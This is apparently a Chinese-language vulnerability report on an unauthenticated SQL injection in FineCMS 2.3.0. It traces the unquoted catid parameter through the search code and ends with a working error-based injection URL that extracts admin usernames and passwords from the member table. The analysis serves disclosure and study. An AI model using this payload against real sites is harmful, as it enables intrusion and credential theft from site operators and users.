### 简要描述: finecms最新版2.3.0(2014年4月18号更新)SQL注入 ### 详细说明: finecms最新版2.3.0,官方2014年4月18号更新。 某处存在SQL注入,无需登陆,可直接注入获取管理员账号。 文件:FineCMS v2.3.0/shop/controllers/search.php ``` /** * 搜索 */ public function index() { parent::_search(); } ``` 进入search,文件/FineCMS v2.3.0/dayrui/core/D_Module.php: ``` /** * 模块内容搜索页 */ protected function _search() { $this->load->model('search_model'); $mod = $this->get_cache ('module-'.SITE_ID.'-'.APP_DIR); // 清除过期缓存 $this->search_model->clear($mod ['setting']['search']['cache']); // 搜索参数 $get = $this->input->get(NULL, TRUE); $get = isset($get['rewrite']) ? dr_rewrite_decode($get['rewrite']) : $get; $id = $get['id']; $catid = (int)$get['catid']; $get['keyword'] = str_replace(array ('%', ' '), array('', '%'), $get['keyword']); unset($get['c'], $get['m'], $get ['id'], $get['page']); // 关键字个数判断 if ($get['keyword'] && strlen($get ['keyword']) < (int)$mod['setting']['search'] ['length']) { $this->msg(lang('mod-31')); } if ($id) { // 读缓存数据 $data = $this->search_model- >get($id); $catid = $data['catid']; $data['get'] = $data ['params']; if (!$data) { $this->msg(lang('mod-32')); } } else { // 组合搜索条件 $data = $this->search_model- >set($get); } list($parent, $related) = $this- >_related_cat($mod, $catid); $urlrule = $mod['setting']['search'] ['rewrite'] ? 
'search-id-{id}-page-{page}.html' : 'index.php?c=search&id={id}&page={page}'; $this->template->assign (dr_category_seo($mod, $mod['category'][$catid], max (1, (int)$this->input->get('page')))); $this->template->assign(array( 'get' => $get, 'cat' => $mod['category'] [$catid], 'caitd' => $catid, 'parent' => $parent, 'related' => $related, 'keyword' => $get['keyword'], 'urlrule' => str_replace ('{id}', $data['id'], $urlrule), )); $this->template->assign($data); $this->template->display ('search.html'); } /** * 顶级可用栏目 */ public function show_select_category() { $data = array(); $category = $this->get_cache ('module-'.SITE_ID.'-'.APP_DIR, 'category'); foreach ($category as $t) { if (!$t['child'] && $t ['permission'][$this->member['mark']]['add']) { $pids = explode(',', $t['pids']); $pid = (int)$pids[1]; if (isset($category [$pid])) { $category [$pid]['mark'] = 1; $data[$pid] = $category[$pid]; } } } $this->template->assign(array( 'id' => 2, 'list' => $data )); $this->template->display ('category_select.html'); } ``` 在组合搜索条件时处理了get参数。 文件,/FineCMS v2.3.0/dayrui/models/Search_model.php: ``` public function set($get) { // 查询表名称 $table = $this->db->dbprefix (SITE_ID.'_'.APP_DIR); $table_more = $this->db->dbprefix (SITE_ID.'_'.APP_DIR.'_category_data'); ......... // 栏目的字段 if ($get['catid']) { $more = FALSE; $cat_field = $module ['category'][$get['catid']]['field']; $where[0] = '`'. $table.'`.`catid`'.($module['category'][$get ['catid']]['child'] ? 'IN ('.$module['category'][$get ['catid']]['childids'].')' : '='.$get['catid']); if ($cat_field) { foreach ($cat_field as $name => $field) { if (isset ($get[$name]) && $get[$name]) { $more = TRUE; $where[] = $this->_where($table_more, $name, $get [$name], $cat_field); } if (isset ($_order_by[$name])) { $more = TRUE; $order_by[] = '`'.$table.'`.`'.$name.'` '.$_order_by [$name]; } } } if ($more) $from.= ' LEFT JOIN `'.$table_more.'` ON `'.$table.'`.`id`=`'. $table_more.'`.`id`'; } ......... 
``` 在处理栏目字段时: ``` $where[0] = '`'.$table.'`.`catid`'.($module ['category'][$get['catid']]['child'] ? 'IN ('.$module ['category'][$get['catid']]['childids'].')' : '='. $get['catid']); ``` 对参数carid没有加引号保护,导致SQL注入。 ### 漏洞证明: EXP: ``` http://localhost/shop/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000 ``` 如图,获取管理员帐号信息: [<img src="https://images.seebug.org/upload/201405/10155712b85ae0fb2cfd42e1481837fa12483583.jpg" alt="finecms1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/10155712b85ae0fb2cfd42e1481837fa12483583.jpg)